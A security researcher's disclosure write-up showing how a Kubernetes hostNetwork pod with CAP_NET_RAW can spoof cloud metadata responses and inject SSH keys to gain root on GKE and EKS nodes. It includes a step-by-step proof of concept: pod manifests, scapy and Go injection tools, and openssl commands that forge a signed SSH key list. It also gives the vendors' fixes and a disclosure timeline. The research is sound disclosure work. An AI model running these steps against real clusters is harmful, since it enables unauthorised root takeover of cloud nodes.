After finding that having containers with CAP_NET_RAW
could allow you to launch Host MITM attack via IPv6 rogue router advertisements,
on top of classic ARP spoofing when using bridge CNI, i went ahead and looked for more fun network attacks.
CAP_NET_RAW
Linux capability allows you open raw sockets to listen on all traffic in the network namespace (tcpdump), but also to send any type of packets.
CAP_NET_RAW
is enabled by default in Docker/Containerd, but not in cri-o since 1.18
only to allow ping
to work. It's a bad default that should be replaced by the usage of the net.ipv4.ping_group_range
sysctls.
Traffic is more and more secured using TLS, but on many cloud providers you have a metadata service accessible over HTTP at http://169.254.169.254, and in the metadata provided you can sometimes find the user ssh public key. AWS, GCP and maybe others allow to connect to an instance using ssh keys not present at instance boot, meaning they dynamically retrieve new ssh keys, over HTTP, at runtime, so a MITM allow us to insert our ssh key and log as a sudoer or root user.
By using hostNetwork=true
+ CAP_NET_RAW
, it was possible to gain root privilege on the node on both EKS and GKE clusters.
Another way to get MITM is to use K8S CVE-2020-8554.
In my testing, Azure is retrieving the ssh keys securely, and cloud-init
Linux package only retrieves ssh keys once, early during boot.
An attacker gaining access to a hostNetwork=true
container with CAP_NET_RAW
capability can listen to all the traffic going through the host and inject arbitrary traffic,
allowing to tamper with most unencrypted traffic (HTTP, DNS, DHCP, ...), and disrupt encrypted traffic.
In GKE the host queries the metadata service at http://169.254.169.254 to get information, including the authorized ssh keys.
By manipulating the metadata service responses, injecting our own ssh key, we gain root privilege on the host.
-
Create a GKE cluster
-
Create a
hostNetwork=true
podkubectl apply -f - <<'EOF' apiVersion: v1 kind: Pod metadata: name: ubuntu-node spec: hostNetwork: true containers: - name: ubuntu image: ubuntu:latest command: [ "/bin/sleep", "inf" ] EOF
-
Copy metadatascapy.py script)
kubectl cp metadatascapy.py ubuntu-node:/metadatascapy.py
-
Connect to the container
kubectl exec -ti ubuntu-node -- /bin/bash
(the next commands are in the container shell)
-
Install the needed packages
apt update && apt install -y python3-scapy openssh-client
-
Generate an ssh key (this is the key that we are going to inject and use to ssh into the host)
ssh-keygen -t ed25519 -f /root/.ssh/id_ed25519 -N ""
-
Launch the script, wait up to 2min, enjoy
python3 /metadatascapy.py
(If you see a kubeconfig and some certificates printed, it worked)
To hijack a TCP connection like an HTTP request you need to have the correct TCP sequence numbers, and to respond faster than the server. As Google is using HTTP long pooling to wait for new SSH keys (1min+), and we can listen to all traffic, it's pretty easy using Scapy to forge TCP packets.
There are 2 ways to inject traffic so it can be received by the same host:
- use a L2 raw socket and 'lo' interface
- use a L3 raw socket
In the past, using L2 socket on lo interface was not working so Scapy FAQ recommend to use L3.
Also GKE nodes were already using net.ipv4.conf.all.rp_filter = 1
sysctl effectively blocking L2.
To block L3 Google team just added the following iptables rules on GKE nodes
iptables -w -t mangle -I OUTPUT -s 169.254.169.254 -j DROP
This iptables rule was added in
- 1.19.2-gke.2400
- 1.18.9-gke.2500
- 1.17.12-gke.2500
- 1.16.15-gke.2600
This only fixes GKE, if you are deploying K8S yourself on GCP instances you are likely still vulnerable.
AWS allows to connect to Linux instances via SSH using a feature called "EC2 Instance Connect" To do this, the AWS AMI have the following line in the SSH configuration (sshd_config):
AuthorizedKeysCommand /opt/aws/bin/eic_run_authorized_keys %u %f
The eic_curl_authorized_keys script (before fix) queries the metadata service at http://169.254.169.254 One of the responses is a signed list of ssh keys with the instance name and an expiration timestamp like this:
#Timestamp=2147483647
#Instance=realinstancename
#Caller=wedontcare
#Request=wedontcare
ssh-rsa ...
sha256/rsa signature in base64
We cannot replay those responses on a different instance:
- the instance name is retrieved over HTTP but it is verified
- and we don't have the private key matching this public key
Now if we go back to the beginning of eic_curl_authorized_keys, here is what happens:
-
Define the address of the metadata service as http://169.254.169.254/
-
PUT /latest/api/token
-> get a metadata v2 token
-
GET /latest/meta-data/instance-id/
-> get the instance-id, then verify it against /sys/devices/virtual/dmi/id/board_asset_tag
-
HEAD /latest/meta-data/managed-ssh-keys/active-keys/USER/
-
GET /latest/meta-data/placement/availability-zone/
-> from the availability zone name we extract the region name (us-east-2)
-
GET /latest/meta-data/services/domain/
-> in my region this is amazonaws.com
-
With 5 and 6 we deduce the expected CN of the signer certificate
expected_signer="managed-ssh-signer.${region}.${domain}"
-
GET /latest/meta-data/managed-ssh-keys/signer-cert/
-> the signer cert + chain
-
GET /latest/meta-data/managed-ssh-keys/signer-ocsp/
-> for each cert the SHA1 fingerprint of it
-
GET /latest/meta-data/managed-ssh-keys/signer-ocsp/SHA1
-> retrieve the actual OCSP responses
-
GET /latest/meta-data/managed-ssh-keys/active-keys/USER/
-> get the signed ssh keys list
-
pass all of that to eic_parse_authorized_keys
-> this script checks that the certificates match expected_signer, is trusted and with valid OCSP responses.
If you read carefully, an attacker able to perform a MITM between the eic_curl_authorized_keys script and the metadata service can inject responses for 4/6/8/9/10/11 and then SSH as root on the instance
To make it short:
- managed-ssh-signer.us-east-2.amazonaws.com signed by Amazon is trusted
- managed-ssh-signer.us-east-2.champetier.net signed by Let's Encrypt can also be trusted with the right responses
On AWS EKS, an attacker able to get arbitrary code execution as root in a hostNetwork pod
can use the CAP_NET_RAW
capability to monitor and inject packets on the instance.
This POC shows how easy we can go from hostNetwork to the node. It uses Golang (gopacket) as scapy was often slower to inject packets than the metadata service to respond, making the attack unreliable.
-
Files:
- cert0.pem: CN=managed-ssh-signer.us-east-2.champetier.net, expired Jan 10 2021
- privkey.pem: the private key of the cert
- cert1.pem: CN=Let's Encrypt Authority X3
- cert2.pem: CN=DST Root CA X3
- go.mod, go.sum, mitmmeta.go: The Golang POC
-
Deploy an EKS cluster in us-east-2 region, configure kubectl
We could target other regions but the provided cert0.pem is for us-east-2 In my tests AMI was AL2_x86_64 / 1.17.11-20201007
-
Launch a hostNetwork pod
kubectl apply -f - <<'EOF' apiVersion: v1 kind: Pod metadata: name: ubuntu-node spec: hostNetwork: true containers: - name: ubuntu image: ubuntu:latest command: [ "/bin/sleep", "inf" ] EOF
-
Copy the 7 files in the container
kubectl cp . ubuntu-node:/
-
Connect to the container
kubectl exec -ti ubuntu-node -- /bin/bash
The next commands are all run in the pod
-
Install the needed softwares
apt update && apt install -y openssh-client curl openssl libpcap-dev golang
-
Build the Golang POC
go build .
-
Download the OCSP responses, concatenate the signer cert
downloadocsp() { fingerprint=$(openssl x509 -noout -fingerprint -sha1 -inform pem -in "${1}" | /bin/sed -n 's/SHA1 Fingerprint[[:space:]]*=[[:space:]]*\(.*\)/\1/p' | tr -d ':') ocsp_url="$(openssl x509 -noout -ocsp_uri -in "${1}")" openssl ocsp -no_nonce -issuer "${2}" -cert "${1}" -url "$ocsp_url" -respout "${3}/$fingerprint-raw" base64 -w0 "${3}/$fingerprint-raw" > "${3}/$fingerprint" rm -f "${3}/$fingerprint-raw" } mkdir ocsp downloadocsp cert0.pem cert1.pem ocsp downloadocsp cert1.pem cert2.pem ocsp cat cert0.pem cert1.pem > signer.pem
-
Generate an SSH key, this is the key we will use to connect with
ssh-keygen -t ed25519 -f /root/.ssh/id_ed25519 -N ""
-
Prepare the API "ssh response"
cat > sshkeys-unsigned <<EOF #Timestamp=2147483647 #Instance=$(curl http://169.254.169.254/latest/meta-data/instance-id/ -s) #Caller=wedontcare #Request=wedontcare EOF cat /root/.ssh/id_ed25519.pub >> sshkeys-unsigned openssl dgst -sha256 -sigopt rsa_padding_mode:pss -sigopt rsa_pss_saltlen:32 -sign privkey.pem sshkeys-unsigned | base64 -w0 > sshkeys-signature cat sshkeys-unsigned sshkeys-signature > sshkeys echo "" >> sshkeys
-
Launch the POC
./mitmmeta
-
In a second shell, connect to the pod and connect to the node
kubectl exec -ti ubuntu-node -- /bin/bash ssh [email protected]
you are now root on the instance
Searching in Certificate Transparency logs, it seems I'm the only one having created such cert.
- 2020-06-15: Report to K8S security team (via HackerOne) to make them consider dropping
CAP_NET_RAW
by default. Only GKE was tested at that time. - 2020-07-01: Report to Google
- 2020-10-19: Finally find some time to look at EKS on the weekend, report to AWS Security
- 2020-10-23: Google start rolling out their GKE fix
- 2020-11-10: Google bounty :) (Donated to Handicap International)
- 2020-11-12: Quick call with AWS Security to confirm they understood my report correctly
- 2020-11-17: AWS push a fix to verify the domain (actually dated 2020-10-22)
- 2020-12-04: AWS confirm fix on their side
- 2020-12-07: Ask confirmation to Google if I can talk about this publicly as ticket is not marked fixed yet
- 2021-02-04: K8S (HackerOne) report closed as provider specific
- 2021-02-10: Google finally mark the ticket as fixed
- 2021-02-28: Finally finish this write-ups
Thanks to Google for the bounty, and thanks to AWS and K8S Team.